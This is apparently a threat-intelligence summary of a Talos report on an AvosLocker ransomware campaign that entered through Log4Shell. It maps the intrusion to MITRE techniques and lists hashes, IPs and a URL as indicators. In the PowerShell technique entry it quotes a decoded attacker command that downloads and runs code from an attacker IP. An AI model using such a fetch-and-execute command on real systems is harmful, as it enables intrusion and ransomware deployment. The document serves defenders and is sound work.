Avos ransomware group expands with new attack arsenal

Talos observed a month-long AvosLocker campaign leveraging Sliver, Cobalt Strike, and network scanners to move laterally after exploiting Log4Shell on exposed VMware Horizon UAG appliances. The incident underscores the importance of properly configured security appliances, timely patching, and a layered defense to detect and prevent post-exploitation encryption. #AvosLocker #Log4Shell

Keypoints

AvosLocker conducted a month-long campaign using Cobalt Strike, Sliver, and multiple commercial network scanners.
Initial access came through VMware Horizon Unified Access Gateways vulnerable to Log4Shell, with Cisco appliances not properly configured, enabling foothold.
Threat actor profile: AvosLocker is a ransomware group operating under a RaaS model, recruiting affiliates and historically targeting Windows and now Linux variants.
Attack timeline includes WMI usage, encoded PowerShell commands, Sliver deployment, Mimikatz, a ZIP with Cobalt Strike beacons, and lateral movement via WMIC and PDQ Deploy.
Multiple threat actors and tools were present on the network, including DarkComet samples, suggesting parallel compromises.
Defense takeaway emphasizes configuring security appliances, applying updates, monitoring alerts, and deploying layered defenses with endpoint protections and behavior analysis.

MITRE Techniques

[T1190] Exploit Public-Facing Application – The initial ingress point in this incident was a pair of VMWare Horizon Unified Access Gateways that were vulnerable to Log4Shell. [‘The initial ingress point in this incident was a pair of VMWare Horizon Unified Access Gateways that were vulnerable to Log4Shell.’]
[T1047] Windows Management Instrumentation – The attackers utilized the WMI Provider Host (wmiprvse.exe) on a Windows Server that were the initial point of entry to run an encoded PowerShell script using the DownloadString method. [‘The attackers utilized the WMI Provider Host (wmiprvse.exe) on a Windows Server that was the initial point of entry to run an encoded PowerShell script using the DownloadString method at 01:41 UTC on Feb. 11.’]
[T1059.001] PowerShell – Encoded and decoded PowerShell commands were used to download and execute payloads. [‘powershell.exe -exec bypass -enc aQBlAHgAIAAoAE4AZQB3AC…’]; [‘Decoded: iex (New-Object SystemNetWebClient)DownloadString(‘http://45[.]136[.]230[.]191:4000/D234R23′);’]
[T1105] Ingress Tool Transfer – Sliver payload and other tools downloaded/executed after initial access. [‘On March 6, the attacker ran more PowerShell scripts to download and execute a Sliver payload labeled “vmware_kb.exe”.’]
[T1021] Remote Services – Proliferation of ransomware and tools across the network using PDQ Deploy, a legitimate deployment tool. [‘To proliferate the ransomware and other tools across the target network, the attackers used PDQ Deploy, a legitimate software deployment tool.’]
[T1003] Credential Dumping – Mimikatz was downloaded/executed as part of credential access. [‘…download and execute Mimikatz…’]
[T1046] Network Service Scanning – Discovery using SoftPerfect Network Scanner to map the network. [‘…SoftPerfect Network Scanner.’]
[T1486] Data Encrypted for Impact – Ransomware encryption of victims’ files after payload delivery. [‘the victims files were then encrypted and a ransom note was displayed, shown below.’]

Indicators of Compromise

[Hash] AvosLocker – ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f, cee38fd125aa3707DC77351dde129dba5e5aa978b9429ef3e09a95ebf127b46b
[Hash] Sliver – 7f0deab21a3773295319e7a0afca1bea792943de0041e22523eb0d61a1c155e2
[Hash] Mimikatz – cac73029ad6a543b423822923967f4c240d02516fab34185c59067896ac6eb99, 29a3ae1d32e249d01b39520cd1db27aa980e646d83694ff078424bed60df9304
[Hash] Cobalt Strike artifacts – 48514e6bb92dd9e24a16a4ab1c7c3bd89dad76bef53cec2a671821024fadcb2b, 61239d726c92c82f553200ecbec3ac18d251902fb9ca4d4f52263c82374a5b75
[URL] URLs – hxxp[://]45[.]136[.]230[.]191:4000/D234R23
[IP] IPs – 176[.]113[.]115[.]107, 45[.]136[.]230[.]191
[File] Filenames – watcher.exe, vmware_kb.exe, IIS Temporary Compressed Files.zip